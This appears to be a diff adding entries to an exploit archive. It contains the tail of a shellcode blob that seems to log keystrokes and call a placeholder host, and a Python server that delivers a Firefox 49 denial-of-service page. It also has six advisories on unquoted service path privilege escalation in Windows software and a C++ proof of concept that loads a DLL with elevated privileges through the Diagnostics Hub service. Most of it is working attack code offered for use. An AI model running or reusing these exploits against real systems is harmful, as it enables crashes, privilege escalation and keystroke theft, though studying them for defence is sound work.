;"\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77"
;"\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00"
;"\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x10\xe9\x1c\x01"
;"\x00\x00\x68\xa9\x28\x34\x80\xff\xd5\x8d\x70\x1c\x87\xf4\x58\x87"
;"\xe6\x89\xc6\x68\x6c\x6c\x00\x00\x68\x72\x74\x2e\x64\x68\x6d\x73"
;"\x76\x63\x54\x68\x4c\x77\x26\x07\xff\xd5\xe9\x04\x01\x00\x00\x68"
;"\x1f\xcd\x1e\x0d\xff\xd5\x86\xe0\xc1\xc8\x10\x40\x40\x56\x50\x89"
;"\xe6\x31\xc0\x50\x50\x50\x50\x40\x40\x50\x50\x68\xea\x0f\xdf\xe0"
;"\xff\xd5\x89\xc7\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85"
;"\xc0\x74\x0f\xff\x4e\x08\x75\xec\x31\xc0\x50\x68\xf0\xb5\xa2\x56"
;"\xff\xd5\x68\x33\x32\x00\x00\x68\x75\x73\x65\x72\x54\x68\x4c\x77"
;"\x26\x07\xff\xd5\x68\x61\x74\x65\x00\x68\x65\x79\x53\x74\x68\x47"
;"\x65\x74\x4b\x54\x50\x68\x49\xf7\x02\x78\xff\xd5\x56\x57\x50\x31"
;"\xc9\x89\xce\xb1\x08\x56\xe2\xfd\x31\xc9\x31\xf6\x6a\x08\x68\x44"
;"\xf0\x35\xe0\xff\xd5\x89\xf0\x3c\xff\x73\xed\x46\x56\xff\x54\x24"
;"\x24\x89\xf2\x31\xc9\xb1\x80\x21\xc8\x31\xc9\x39\xc8\x75\x10\x31"
;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xb3\x14\x84\xeb\xd6\x31"
;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xa3\x14\x84\x72\xc6\x31"
;"\xd2\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xab\x14\x84\x56\x6a\x10"
;"\xff\x74\x24\x30\x6a\x00\x6a\x01\x8d\x4c\x24\x10\x51\xff\x74\x24"
;"\x3c\x68\x75\x9d\x5c\xdf\xff\xd5\x8d\x64\x24\x04\xeb\x8a\xe8\xdf"
;"\xfe\xff\xff\x77\x77\x77\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63"
;"\x6f\x6d\x00\xe8\xf7\xfe\xff\xff\x34\x34\x34\x34\x00"

147
platforms/windows/dos/40536.py Executable file
View file

@ -0,0 +1,147 @@
'''
#Hi guys
#Title: Firefox 49.0.1 crash Denial of Service
#Date: 15 Oct 2016
#Author: sultan albalawi
#video: https://www.facebook.com/pentest3/videos/vb.100012552940568/199310163830747/?type=2&theater
#Tested on:win7
#Open link in firefox
#Double click on the Click You will see the report that there are crach
#thanks
.........................................................................
'''
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
import subprocess,string
host='192.168.100.3'
port=6060
ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
ban+='\n'
ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
print ban
print "please wait ...."
i=1
while i <= 4120:
i+=1
ban+=string.ascii_uppercase*250
ban=ban
class Req(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
self.wfile.write('''<html>
<head>
<title>Firefox 49.0.1 Vulnerability</title>
</br>
<h1>Firefox 49.0.1 Vulnerability <h1>
<h1>\x41\x75\x74\x68\x6f\x72\x3a\x20\x53\x75\x6c\x74\x61\x6e\x2d\x61\x6c\x62\x61\x6c\x61\x77\x69<h1>
<h1>\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n<h1>
</div>'''+''+'''</body>
<script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 50000; i++) {
buffer += "\x41";
}
var buffer2 = buffer;
for (i = 0; i < 5000; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body>'helo firefox'<a href="javascript:ex();">CLICK
</a></body></html>''')
class runHTTP(HTTPServer):
def __init__(self,host,port):
ipadd=(host,port)
HTTPServer.__init__(self,ipadd,Req)
def createfile():
global filecreate
filecreate = "Firefox.dat"
open(filecreate, "wb").write(ban)
print filecreate
createfile()
def start():
global filecreate
ser=runHTTP(host,port)
print "http://{}:{}/{}".format(host,port,filecreate)
ser.serve_forever()
start()

32
platforms/windows/local/40535.txt Executable file
View file

@ -0,0 +1,32 @@
#########################################################################
# Exploit Title: Wondershare PDFelement Unquoted Service Path Privilege
Escalation
# Date: 10/14/2016
# Author: Saeed Hasanzadeh (Net.Hun73r)
# Vendor Homepage: https://www.wondershare.com/
# Software Link:
http://download.wondershare.com/inst/pdfelement_setup_full1042.exe
#version : 5.2.9
# Tested on: Windows 7
##########################################################################
Wondershare PDFelement installs a service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the
service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc WsAppService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WsAppService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Wondershare\WAF\2.2.3.2\WsAppService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Application Framework Service
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem

43
platforms/windows/local/40538.txt Executable file
View file

@ -0,0 +1,43 @@
# Exploit Title: Graylog Collector Service Path Privilege Escalation
# Date: 10/14/2016
# Exploit Author: Joey Lane
# Software Link: https://github.com/Graylog2/collector
# Version: 0.4.2
# Tested on: Windows Server 2012 R2
Graylog Collector installs as a service with an unquoted service path. If
the user installs this service in a directory containing a space, this will
create a privilege escalation vulnerability. To properly exploit this
vulnerability, a local attacker can insert an executable file in the path
of the service. Rebooting the system or restarting the service will run
the malicious executable with elevated privileges.
This was tested on version 0.4.2, but may affect other versions as well.
---------------------------------------------------------------------------
C:\sc qc GraylogCollector
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: GraylogCollector
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\graylog collector\bin\windows\graylog-collector-service-x86.exe //RS//GraylogCollector
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Graylog Collector (GraylogCollector)
DEPENDENCIES : Tcpip
: Afd
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"graylog.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.

32
platforms/windows/local/40539.txt Executable file
View file

@ -0,0 +1,32 @@
#########################################################################
# Exploit Title: NETGATE Registry Cleaner Unquoted Service Path
Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
# Software Link:
http://www.netgate.sk/download/download.php?id=4
#version : build 16.0.205 (Latest)
# Tested on: Windows 7
##########################################################################
NETGATE Registry Cleaner installs a service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc NGRegClnSrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NGRegClnSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Registry
Cleaner\RegistryCleanerSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NETGATE Registry Cleaner Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

47
platforms/windows/local/40540.txt Executable file
View file

@ -0,0 +1,47 @@
#########################################################################
# Exploit Title: NETGATE AMITI Antivirus Unquoted Service Path
Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
# Software Link:
http://www.netgate.sk/download/download.php?id=11
#version : build 23.0.305 (Latest)
# Tested on: Windows 7
##########################################################################
AMITI Antivirus installs two service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc AmitiAvSrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AmitiAvSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti
Antivirus\AmitiAntivirusSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Amiti Antivirus Engine Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>sc qc AmitiAvHealth
[SC] QueryServiceConfig SUCCESS
----------------------------------------------------
SERVICE_NAME: AmitiAvHealth
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti
Antivirus\AmitiAntivirusHealth.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Amiti Antivirus Health Check
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

31
platforms/windows/local/40541.txt Executable file
View file

@ -0,0 +1,31 @@
#########################################################################
# Exploit Title: NETGATE Data Backup Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
# Software Link:
http://www.netgate.sk/download/download.php?id=5
#version : build 3.0.605 (Latest)
# Tested on: Windows 7
##########################################################################
NETGATE Data Backup installs a service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc NGDatBckpSrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NGDatBckpSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Data
Backup\DataBackupSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NETGATE Data Backup Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

45
platforms/windows/local/40550.txt Executable file
View file

@ -0,0 +1,45 @@
#########################################################################
# Exploit Title: Spy Emergency Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.spy-emergency.com/
# Software Link: http://www.spy-emergency.com/download/download.php?id=1
#version : build 23.0.205 (Latest)
# Tested on: Windows 7
##########################################################################
Spy Emergency installs two service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc SpyEmrgHealth
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SpyEmrgHealth
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Spy
Emergency\SpyEmergencyHealth.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Spy Emergency Health Check
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
------------------------------------------------------------------
C:\>sc qc SpyEmrgSrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SpyEmrgSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Spy
Emergency\SpyEmergencySrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Spy Emergency Engine Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

192
platforms/windows/local/40562.cpp Executable file
View file

@ -0,0 +1,192 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=887
Windows: Diagnostics Hub DLL Load EoP
Platform: Windows 10 10586, not tested 8.1 Update 2 or Windows 7
Class: Elevation of Privilege
Summary:
The fix for CVE-2016-3231 is insufficient to prevent a normal user specifying an insecure agent path leading to arbitrary DLL loading at system privileges.
Description:
CVE-2016-3231 was an issue caused by passing a relative agent path name which allowed the DLL path loaded for the agent DLL to be redirected to another file. This seems to have been fixed and as far as I can tell this issue is no longer exploitable from a sandbox. However the problem is theres an assumption that its not possible to write a file to the system32 directory, which technically is true but practically for this exploit false.
As Ive blogged about before, and also submitted bugs (for example MSRC-21233) a normal user can created named streams on directories as long as they have FILE_ADD_FILE access right to the directory. When you do this you create what looks from a path perspective to be in the parent. For example the system32\tasks folder is writable by a normal user, so you can copy a DLL to system32\tasks:abc.dll and when GetFullPathName is called the filename returned is tasks:abc.dll. When the GetValidAgentPath is called it checks if this file is in system32 by using GetFileAttributes, which succeeds and the service will proceed to load the file.
On the fixing side of things, I cant see an obvious reason why just checking for invalid path characters in the agent path wouldnt be sufficient (and in fact would arguably have fixed the original bug as well). Of course I think its slightly dodgy that youll load any DLL from system32, even ones which arent agent DLLs. Youd have to find something which was somehow exploitable in a very short time window during DllMain but it might work.
Also I wonder whether theyre any legitimate uses for named streams on NTFS directories? While its certainly out of scope perhaps they could only be created by admins? Or perhaps the access check shouldnt be on the target directories but its parent directory where the effective file appears to be located.
Proof of Concept:
Ive provided a PoC as a C++ source code file. Youll also need a DLL to test load, Ive not provided one of these but any should do, as long as it matches the bitness of the OS.
1) Compile the C++ source code file.
2) Execute the poc passing the path to the DLL you want to load in the service as a normal user.
3) It should print that the DLL was loaded successfully.
Expected Result:
The loading of a DLL fails as the path is rejected.
Observed Result:
The DLL is loaded successfully.
*/
// ExploitCollector.cpp : Defines the entry point for the console application.
//
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <comdef.h>
#include <strsafe.h>
GUID CLSID_CollectorService =
{ 0x42CBFAA7, 0xA4A7, 0x47BB,{ 0xB4, 0x22, 0xBD, 0x10, 0xE9, 0xD0, 0x27, 0x00, } };
class __declspec(uuid("f23721ef-7205-4319-83a0-60078d3ca922")) ICollectionSession : public IUnknown {
public:
virtual HRESULT __stdcall PostStringToListener(REFGUID, LPWSTR) = 0;
virtual HRESULT __stdcall PostBytesToListener() = 0;
virtual HRESULT __stdcall AddAgent(LPWSTR path, REFGUID) = 0;
//.rdata:0000000180035868 dq offset ? Start@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Start(tagVARIANT *)
//.rdata:0000000180035870 dq offset ? GetCurrentResult@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJFPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetCurrentResult(short, tagVARIANT *)
//.rdata:0000000180035878 dq offset ? Pause@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJXZ; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Pause(void)
//.rdata:0000000180035880 dq offset ? Resume@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJXZ; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Resume(void)
//.rdata:0000000180035888 dq offset ? Stop@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Stop(tagVARIANT *)
//.rdata:0000000180035890 dq offset ? TriggerEvent@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJW4SessionEvent@@PEAUtagVARIANT@@11@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::TriggerEvent(SessionEvent, tagVARIANT *, tagVARIANT *, tagVARIANT *)
//.rdata:0000000180035898 dq offset ? GetGraphDataUpdates@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJAEBU_GUID@@PEAUtagSAFEARRAY@@PEAUGraphDataUpdates@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetGraphDataUpdates(_GUID const &, tagSAFEARRAY *, GraphDataUpdates *)
//.rdata:00000001800358A0 dq offset ? QueryState@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAW4SessionState@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::QueryState(SessionState *)
//.rdata:00000001800358A8 dq offset ? GetStatusChangeEventName@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAPEAG@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetStatusChangeEventName(ushort * *)
//.rdata:00000001800358B0 dq offset ? GetLastError@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAJ@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetLastError(long *)
//.rdata:00000001800358B8 dq offset ? SetClientDelegate@EtwCollectionSession@StandardCollector@DiagnosticsHub@Mic
};
struct SessionConfiguration
{
DWORD version; // Needs to be 1
DWORD a1; // Unknown
DWORD something; // Also unknown
DWORD monitor_pid;
GUID guid;
BSTR path; // Path to a valid directory
CHAR trailing[256];
};
class __declspec(uuid("7e912832-d5e1-4105-8ce1-9aadd30a3809")) IStandardCollectorClientDelegate : public IUnknown
{
};
class __declspec(uuid("0d8af6b7-efd5-4f6d-a834-314740ab8caa")) IStandardCollectorService : public IUnknown
{
public:
virtual HRESULT __stdcall CreateSession(SessionConfiguration *, IStandardCollectorClientDelegate *, ICollectionSession **) = 0;
virtual HRESULT __stdcall GetSession(REFGUID, ICollectionSession **) = 0;
virtual HRESULT __stdcall DestroySession(REFGUID) = 0;
virtual HRESULT __stdcall DestroySessionAsync(REFGUID) = 0;
virtual HRESULT __stdcall AddLifetimeMonitorProcessIdForSession(REFGUID, int) = 0;
};
_COM_SMARTPTR_TYPEDEF(IStandardCollectorService, __uuidof(IStandardCollectorService));
_COM_SMARTPTR_TYPEDEF(ICollectionSession, __uuidof(ICollectionSession));
class CoInit
{
public:
CoInit() {
CoInitialize(nullptr);
}
~CoInit() {
CoUninitialize();
}
};
void ThrowOnError(HRESULT hr)
{
if (hr != 0)
{
throw _com_error(hr);
}
}
int wmain(int argc, wchar_t** argv)
{
if (argc < 2)
{
printf("poc path\\to\\dll\n");
return 1;
}
CoInit coinit;
try
{
GUID name;
CoCreateGuid(&name);
LPOLESTR name_str;
StringFromIID(name, &name_str);
WCHAR random_name[MAX_PATH];
StringCchPrintf(random_name, MAX_PATH, L"tasks:%ls.dll", name_str);
WCHAR target[MAX_PATH];
GetSystemDirectory(target, MAX_PATH);
StringCchCat(target, MAX_PATH, L"\\");
StringCchCat(target, MAX_PATH, random_name);
WCHAR valid_dir[MAX_PATH];
GetModuleFileName(nullptr, valid_dir, MAX_PATH);
WCHAR* p = wcsrchr(valid_dir, L'\\');
*p = 0;
StringCchCat(valid_dir, MAX_PATH, L"\\etw");
CreateDirectory(valid_dir, nullptr);
if (!CopyFile(argv[1], target, FALSE))
{
printf("Error copying file %d\n", GetLastError());
return 1;
}
IStandardCollectorServicePtr service;
ThrowOnError(CoCreateInstance(CLSID_CollectorService, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&service)));
DWORD authn_svc;
DWORD authz_svc;
LPOLESTR principal_name;
DWORD authn_level;
DWORD imp_level;
RPC_AUTH_IDENTITY_HANDLE identity;
DWORD capabilities;
ThrowOnError(CoQueryProxyBlanket(service, &authn_svc, &authz_svc, &principal_name, &authn_level, &imp_level, &identity, &capabilities));
ThrowOnError(CoSetProxyBlanket(service, authn_svc, authz_svc, principal_name, authn_level, RPC_C_IMP_LEVEL_IMPERSONATE, identity, capabilities));
SessionConfiguration config = {};
config.version = 1;
config.monitor_pid = ::GetCurrentProcessId();
CoCreateGuid(&config.guid);
bstr_t path = valid_dir;
config.path = path;
ICollectionSessionPtr session;
ThrowOnError(service->CreateSession(&config, nullptr, &session));
GUID agent_guid;
CoCreateGuid(&agent_guid);
ThrowOnError(session->AddAgent(random_name, agent_guid));
}
catch (const _com_error& error)
{
if (error.Error() == 0x8007045A)
{
printf("DLL should have been loaded\n");
}
else
{
printf("%ls\n", error.ErrorMessage());
printf("%08X\n", error.Error());
}
}
return 0;
}